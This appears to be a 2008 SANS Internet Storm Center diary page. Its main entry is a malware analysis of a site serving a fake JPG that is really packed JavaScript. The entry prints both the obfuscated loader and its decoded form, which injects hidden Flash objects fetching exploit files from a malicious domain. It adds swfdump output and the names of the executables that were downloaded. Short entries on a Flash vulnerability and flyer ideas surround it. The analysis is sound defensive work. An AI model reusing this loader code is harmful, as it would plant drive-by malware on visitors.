Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Adobe flash player vuln

Published: 2008-05-27
Last Updated: 2008-05-28 23:15:20 UTC
by Adrien de Beaupre (Version: 3)
0 comment(s)

A vulnerability has been reported in Adobe Flash Player versions 9.0.124.0 and older, which is the current version available for download now. Adobe has not yet released a patch nor an official advisory. Stay tuned for further developments. Thanks to Steven and Adrien for letting us know

Update1: Symantec has observed that this issue is being actively exploited in the wild and have elevated their ThreatCon.

Update2: A SecurityFocus article is now live here.

Final update:

Updated: May 28 2008 07:53PM - "...Further research indicates that this vulnerability is the same issue described in BID 28695** (Adobe Flash Player Multimedia File Remote Buffer Overflow Vulnerability), so this BID is being retired

Cheers,
Adrien de Beaupré
Bell Canada, Professional Services

0 comment(s)

Malicious swf files?

Published: 2008-05-27
Last Updated: 2008-05-28 00:38:42 UTC
by Adrien de Beaupre (Version: 3)
0 comment(s)

Marco and Eric wrote in to let us know of a potentially malicious site found at

hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.jpg

The JPG file is actually a script, shown below:

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':
e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r
A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="
6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|
width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|
toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia
|download|align|flash|swflash||version'.split('|'),0,{}))

Using spidermonkey, it decodes to:

if(document.cookie.indexOf("playon=")==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);
document.cookie="playon=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0){document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0"
width="0" height="0" align="middle">');document.write('<param name="allowScriptAccess" value="sameDomain"/>');document.write('<param name="movie" value="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('</object>')}else{document.write
("<EMBED src=hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/08.swf width=0 height=0>")}}

Lets get the swf files and see what they do, wget works.
file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9

Virustotal shows 0/32 for both files.

Swftools can show us what the swf files do:
swfdump -D 08.swf
[HEADER]        File version: 9
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 208 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c00c]       138 DOACTION
                 (   99 bytes) action: Constantpool(5 entries)
String:"flashVersion" String:"/:$version"
String:"http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/"
String:"ff.swf" String:"_root"
                 (    4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: DefineLocal
                 (    4 bytes) action: Push Lookup:2
("http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/")
Lookup:0 ("flashVersion")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:3 ("ff.swf")
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:4 ("_root")
                 (    0 bytes) action: GetVariable
                 (    1 bytes) action: GetUrl2 64
                 (    0 bytes) action: Stop
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Running the swf files in a web browser gives me the following URLs:
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ff.swf
and
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ie.swf
Both of which got me a big fat 404.
Either the final files have been removed, or are looking for a different version of the player.

Thanks to Bojan and Jeremy for their help!

Unknown at this time if these SWF files are related to this vulnerability.

Update1: Fiddling with the URL and looking for potentially vulnerable versions of the player rendered this:

hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%209,0,115,0ie.swf

Which gives us a couple of things. One is that this would seem to be an exploit against Adobe Flash Player. Second is that the apparent vulnerable version would be 9.0.115.0. Third is that there is likely additional malware to see continuing down the rabbit hole. Interestingly this SWF file may be exploiting CVE-2007-0071 and not the potentially new previously unknown vulnerability announced by Symantec today, assuming they are different. 

At this time Adobe still has not released any significant information at their blog http://blogs.adobe.com/psirt/ some clarification would be nice.

Indeed, hxxp://www.play0nlnie.com/ax.exe is downloaded, then hxxp://www.play0nlnie.com/setip.exe

Virustotal was 7/31 for ax.exe, and 7/31 for setip.exe earlier this evening.

Other examples of sites serving malicious swf files are now rolling in, which is the perfect timing for me to hand off the awesome power of the Handler On Duty (HOD) reigns to Jim. Hit the Big Red Button (BGR)!! Must go InfoCon orange...


Cheers,
Adrien de Beaupre
Bell Canada, Professional Services

Keywords: malware swf
0 comment(s)

Suggestions wanted for ISC

Published: 2008-05-27
Last Updated: 2008-05-27 13:32:25 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)
For the last few years, we hand out an "ISC Flyer" / "Cheat sheet" at SANS conferences. It currently includes things like a port list, various NOC/abuse desk contact info and such. However, the flyer is very out of date. So my question to you all:

What would you like to see on a flyer like that? What would you find useful enough to hang on your cubicle wall?

We got a legal size sheet of paper that will be folded three-ways and can be printed on both sides. Font size can be on the small side. The result will be downloadable as PDF.

Please use our contact page to submit your ideas.

Keywords: ISC
0 comment(s)
Diary Archives